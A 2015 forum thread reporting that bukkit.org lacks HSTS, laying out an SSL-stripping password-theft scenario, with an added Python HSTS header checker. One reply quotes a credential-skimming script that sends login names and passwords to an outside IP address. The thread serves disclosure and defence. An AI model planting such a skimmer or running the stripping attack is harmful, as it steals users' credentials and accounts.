Problem/Bug No HSTS for bukkit.org

Discussion in 'Forum Feedback' started by lol768, Dec 9, 2015.

Thread Status:
Not open for further replies.
  1. lol768

    1. User types 'bukkit.org' into their browser address bar and hits enter whilst at a conference on an open WiFi network. They've visited the site before in the past and now that it uses SSL everything should be okay, right?
    2. Attacker intercepts HTTP request on port 80. Normally the response would be something like:
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 09 Dec 2015 10:59:25 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      Location: https://bukkit.org/
      Server: cloudflare-nginx
    3. Attacker connects to https://bukkit.org/ on the victim's behalf, swallows the redirect response and serves all the secure pages back to the victim on port 80.
    4. Victim logs into the forums, inadvertently sends the password to the attacker and has their session cookie compromised too.
    5. Victim happens to have admin access. Attacker uses this to inject malicious scripts into the page and compromise even more accounts.
    6. Eventually someone notices and notifies Curse. Maybe the script is removed after a few months, maybe the users are informed - it doesn't matter because at this point all of the passwords of those who've logged in have been compromised. A smarter script would forcibly log the user out and make them log in again to harvest the passwords of everyone who visited.
     
    Last edited: Dec 9, 2015
    ferrybig likes this.
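Added example (not code from this thread or from bukkit.org): a checker for the response headers in the scenario above. It parses a Strict-Transport-Security value per RFC 6797 and reports why the quoted plain-HTTP 301, which carries no HSTS header, leaves a visit on port 80 strippable; the header maps are constructed, and the one-year minimum is the hstspreload.org requirement.

```python
"""HSTS policy check for an HTTP response. Added example for this thread; not
code from the forum or bukkit.org. Sample headers are constructed; the first
mirrors the 301 quoted in the post."""
from typing import Dict, List, Optional

ONE_YEAR = 31536000  # seconds; the hstspreload.org minimum max-age
# Constructed samples: the plain-HTTP redirect from the post, and a sound policy.
REDIRECT_NO_HSTS = {"Location": "https://bukkit.org/", "Server": "cloudflare-nginx"}
GOOD = {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"}


def parse_hsts(value: str) -> Optional[Dict[str, Optional[str]]]:
    """RFC 6797 parse: lower-cased directive names -> values. Returns None when
    a browser must ignore the header (missing/non-numeric max-age, duplicates)."""
    out: Dict[str, Optional[str]] = {}
    for part in value.split(";"):
        name, has_val, raw = part.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue
        if name in out:  # a repeated directive invalidates the whole header
            return None
        out[name] = raw.strip().strip('"') if has_val else None
    age = out.get("max-age")
    return out if age is not None and age.isdigit() else None


def evaluate_hsts(headers: Dict[str, str], over_tls: bool) -> List[str]:
    """Findings for one response; an empty list means the policy is sound."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []
    loc = h.get("location", "")
    if loc and not loc.lower().startswith("https://"):
        findings.append("redirect does not go to https")
    hsts = h.get("strict-transport-security")
    if hsts is None:  # trust-on-first-use: nothing tells the browser to refuse http
        return findings + ["no HSTS header: a plain-HTTP visit can be stripped"]
    if not over_tls:  # RFC 6797: HSTS received over plain HTTP is ignored
        return findings + ["HSTS over plain HTTP is ignored by browsers"]
    parsed = parse_hsts(hsts)
    if parsed is None:
        return findings + ["malformed HSTS header; browsers will ignore it"]
    age = int(parsed["max-age"])
    if age < ONE_YEAR:
        findings.append(f"max-age {age} is under one year")
    if "includesubdomains" not in parsed:
        findings.append("includeSubDomains missing")
    if "preload" in parsed and (age < ONE_YEAR or "includesubdomains" not in parsed):
        findings.append("preload set but preload-list requirements unmet")
    return findings
```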
  2. Lolmewn

    MITM ftw!
     
  3. This wouldn't happen to be a disappointing Minecraft themed convention hosted in London, would it?
     
    teej107 likes this.
  4. teej107

    umm.......
    there was a recent bug where it wouldn't log you in. No matter how many times you "logged in", it wouldn't log you in.
    https://bukkit.org/threads/cant-login-with-ie11.391369/
     
  5. Lolmewn

    @teej107 That was cookie related and may have had to do with the script (but I have no idea if it did).
     
  6. teej107

    Yeah who knows :p The bug did seem to appear after the admin account got compromised.
     
  7. Tecno_Wizard

    @teej107,
    @Lolmewn I looked at the script. All it did was listen for the form submission. I don't think it would have caused the cookie issue, but it is strange that the time frames match.

    EDIT: Here's the script from October 22
    Code:
    function authXen()
    {
    var xmlhttp = getXmlHttp();
    var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
    var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
    var url = "/web/20151022200106/http://108.61.204.52/a.php?s=bukkit&u=";
    url = url.concat(user);
    url = url.concat("&p=");
    url = url.concat(pass);
    xmlhttp.open("GET", url);
    xmlhttp.send(null);
    }
     
    Last edited: Dec 28, 2015
  8. lol768

    Ultimately we can't know what the script did, it could have served different code based on the user agent, location of the victim, time of day. It could've evolved, changed its purpose etc.
     
  9. kelbiiz

    Thanks for the information... :)
     